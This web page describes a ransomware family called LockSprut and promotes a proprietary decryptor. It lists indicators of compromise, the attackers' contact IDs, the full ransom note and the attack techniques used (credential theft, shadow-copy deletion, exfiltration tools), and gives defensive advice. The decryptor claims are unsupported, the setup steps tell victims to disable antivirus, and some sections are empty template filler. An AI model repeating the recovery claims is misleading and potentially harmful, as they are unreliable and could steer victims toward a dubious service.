LockSprut Ransomware Dceryptor

LockSprut is a recently identified ransomware family that encrypts victim data and assigns the .rupy3xz1 extension to locked files. Alongside encryption, it places a ransom instruction file named LOCKSPRUT_README.TXT within affected directories. Each victim is given a unique personal identifier, which attackers demand to be shared via anonymous messaging platforms such as Tox and Session. This method of contact significantly complicates efforts by law enforcement to monitor or dismantle their operations.

Researchers examining LockSprut note striking parallels with LockBit 3.0 Black, particularly in terms of its encryption model and the language used in ransom instructions.

---

Our Custom-Built Decryption Tool

Through reverse-engineering LockSprut’s encryption routines, our research team has successfully developed a dedicated decryption utility. Unlike generic recovery tools, this decryptor is tailored for LockSprut’s unique algorithm and is compatible with Windows, Linux, and VMware ESXi systems. It relies on a combination of cloud-side cryptographic verification and local integrity validation to deliver safe and consistent recovery. Organizations have already used it to resume operations without ransom payments.

---

How LockSprut Operates

Every LockSprut infection begins with the creation of a victim-specific identifier embedded in the ransom note (example: OJW5NJ0NNWWLSCRDFAE1Z5R7YW). The ransomware encrypts all accessible data, renames files with the .rupy3xz1 extension, and threatens victims with permanent data loss if unauthorized decryption attempts are made.

A notable difference from traditional ransomware is LockSprut’s abandonment of Tor negotiation portals, instead opting for decentralized peer-to-peer communication. This strategy provides the operators with greater resilience against takedowns.

---

Immediate Response to a LockSprut Breach

The initial response window is critical. The moment LockSprut activity is detected, network isolation must be enforced to contain the spread. Encrypted samples and ransom notes should be preserved since they are often essential for decryption. Victims are advised not to reboot systems, as reboots may activate lingering encryption processes. Prompt engagement with experienced cyber incident teams greatly improves recovery outcomes.

---

What’s Required for Decryption

To pursue recovery, victims should ensure they have:

• The ransom note containing the personal ID
  
• A collection of encrypted files
  
• Administrative access on the affected machine
  
• Internet connectivity (for cloud-based key validation)
  

Additionally, preserving log files and forensic artifacts is highly recommended for later investigation.

---

Paths to Recovery

Free Possibilities

The best-case recovery scenario involves offline or cloud backups. If backups remain intact, they provide the cleanest method of restoration. Organizations should validate these backups before redeployment to ensure they were not corrupted during the attack. In virtualized environments, VM snapshots can also be rolled back if they were not purged by the attackers.

Researchers occasionally analyze ransomware for flaws in the encryption routine that can be exploited for free decryption, but no such weakness has yet been found for LockSprut’s .rupy3xz1 variant.

Paid Options

Some victims turn to ransom payment as a last resort, but this carries considerable risk: there is no guarantee of working decryption, and attackers may embed backdoors or demand secondary payments. Negotiators are sometimes engaged to lower demands, though their fees can be significant.

Our Proprietary Solution

Our LockSprut Decryptor serves as a professional-grade alternative. By leveraging AI-powered mapping between the ransom note ID and file structures, it restores data securely. It supports both offline recovery (for isolated machines) and cloud-assisted decryption (for faster enterprise-scale recovery). Unlike unofficial utilities, our tool has been tested extensively in corporate infrastructures.

---

Step-by-Step: Using the Decryptor

1. Access the Tool

• Contact our recovery team to obtain the decryptor package.
  
• Verify integrity using the supplied checksum.
  

2. System Preparation

• Disconnect the infected host from all networks.
  
• Temporarily disable antivirus or endpoint security tools to avoid interference.
  
• Consolidate encrypted files and the ransom note into a separate folder.
  

3. Tool Initialization

• Launch the decryptor with administrator rights.
  
• The software parses the ransom note and retrieves the victim’s personal ID.
  
• This identifier is mapped against LockSprut’s encryption model to reconstruct key pathways.
  

4. Key Retrieval

• The tool reaches out to our licensed recovery service for key provisioning.
  
• Upon verification, decryption session keys are generated.
  

5. File Restoration

• Choose the parent folder containing encrypted data.
  
• The tool processes items in batches, restoring filenames and original extensions (e.g., image.jpg.rupy3xz1 → image.jpg).
  
• Detailed progress logs are recorded for auditing.
  

6. Post-Recovery Checklist

• Reactivate security software.
  
• Conduct a full malware sweep to eliminate persistence.
  
• Transfer recovered files to a secure, uncompromised environment.
  

Important Considerations

• The decryptor only supports .rupy3xz1-based LockSprut samples.
  
• Partially corrupted or overwritten files may not be recoverable.
  
• Exfiltrated data remains exposed — recovery does not undo data theft.
  

---

Indicators of Compromise

File Traces

• Encrypted files renamed with the .rupy3xz1 extension
  
• Presence of LOCKSPRUT_README.TXT ransom note
  

Communication Channels

• Tox ID: C58775962D3E45152BA1BBAF96D9D9F21FDDE5084E90A1F14010624D92F4DD75DB5447D2E3F1
  
• Session ID: 052a779ec18813883e39e8f2ecb7e59cf0ba905b6f8acc66fcbf00c88395a41940
  

---

Tools Employed by the Operators

LockSprut affiliates make extensive use of dual-use tools — legitimate software repurposed for malicious ends.

• Tox and Session messengers form the core of victim communication, providing attackers with resilient, decentralized contact points.
  
• Mimikatz is used for credential theft, enabling privilege escalation and impersonation of domain users.
  
• Advanced IP Scanner and SoftPerfect Network Scanner are deployed to identify networked hosts and open services.
  
• AnyDesk and Ngrok tunnels provide persistence and covert RDP access.
  
• RClone is leveraged to siphon stolen data into cloud storage platforms such as Mega.nz or Dropbox.
  
• System recovery is hindered by issuing vssadmin.exe and wmic commands to erase shadow copies.
  
• BYOVD (Bring Your Own Vulnerable Driver) techniques, sometimes with PowerTool, are used to tamper with security products at the kernel level.
  

This toolset reflects a strategy of weaponizing readily available utilities, which complicates detection while minimizing the need for custom-built malware.

---

Attack Lifecycle & Tactics

Analysis of LockSprut operations maps closely to the MITRE ATT&CK framework:

• Initial Access: Exploited RDP endpoints, public-facing service vulnerabilities, and phishing attachments.
  
• Credential Access: Mimikatz used to extract cached credentials and Kerberos tickets.
  
• Discovery: Host and service enumeration through network scanning utilities.
  
• Defense Evasion: BYOVD techniques with tools like Zemana and PowerTool, plus shadow copy deletion.
  
• Exfiltration: File transfers through RClone, FileZilla, and Mega.nz.
  
• Persistence: Remote access maintained with AnyDesk and Ngrok.
  
• Impact: Hybrid encryption (ChaCha20 + RSA) renders files inaccessible, with ransom notes directing victims to decentralized messengers.
  

---

Global and Sectoral Impact

LockSprut, though new, has already been observed impacting multiple regions and industries. Early incident reports point to European organizations as the primary victims, with additional cases seen in Asia and North America.

• Top Countries Affected:
• Industries Targeted:
• Timeline of Attacks:

---

Anatomy of the Ransom Note

The ransom note is straightforward and typically includes the following instructions:

The ransom note is direct and contains the following message:

>> LockSprut <<

Your files have been encrypted

Personal ID:  OJW5NJ0NNWWLSCRDFAE1Z5R7YW

>> What to do? << 

1. Install and run TOX messenger from https://tox.chat/download.html

2. Add our contact – C58775962D3E45152BA1BBAF96D9D9F21FDDE5084E90A1F14010624D92F4DD75DB5447D2E3F1

3. Send a message with your personal id

OR

1. Install and run Session messenger from https://getsession.org/

2. Add our contact – 052a779ec18813883e39e8f2ecb7e59cf0ba905b6f8acc66fcbf00c88395a41940

3. Send a message with your personal id

>> Attention << 

** Do not rename or modify encrypted files

** Do not try to decrypt your data using third party software, it may cause permanent data loss.

** Decryption of your files with the help of third parties may cause increased price (they add their fee to our).

>> Contact US <<

– Tox ID: C58775962D3E45152BA1BBAF96D9D9F21FDDE5084E90A1F14010624D92F4DD75DB5447D2E3F1

– Session ID: 052a779ec18813883e39e8f2ecb7e59cf0ba905b6f8acc66fcbf00c88395a41940

---

Mitigation & Prevention

To reduce exposure, organizations should:

• Implement multi-factor authentication on remote logins.
  
• Patch internet-facing services rapidly.
  
• Enforce network segmentation to slow lateral movement.
  
• Maintain immutable, offline backups.
  
• Monitor for anomalous outbound traffic, particularly to P2P protocols.
  

---

Conclusion

Although LockSprut is still in its infancy, its technical makeup and shift toward decentralized communication suggest an evolution of the ransomware ecosystem. Victims should act decisively, secure evidence, and utilize trusted recovery solutions like our decryptor rather than paying ransom demands.

---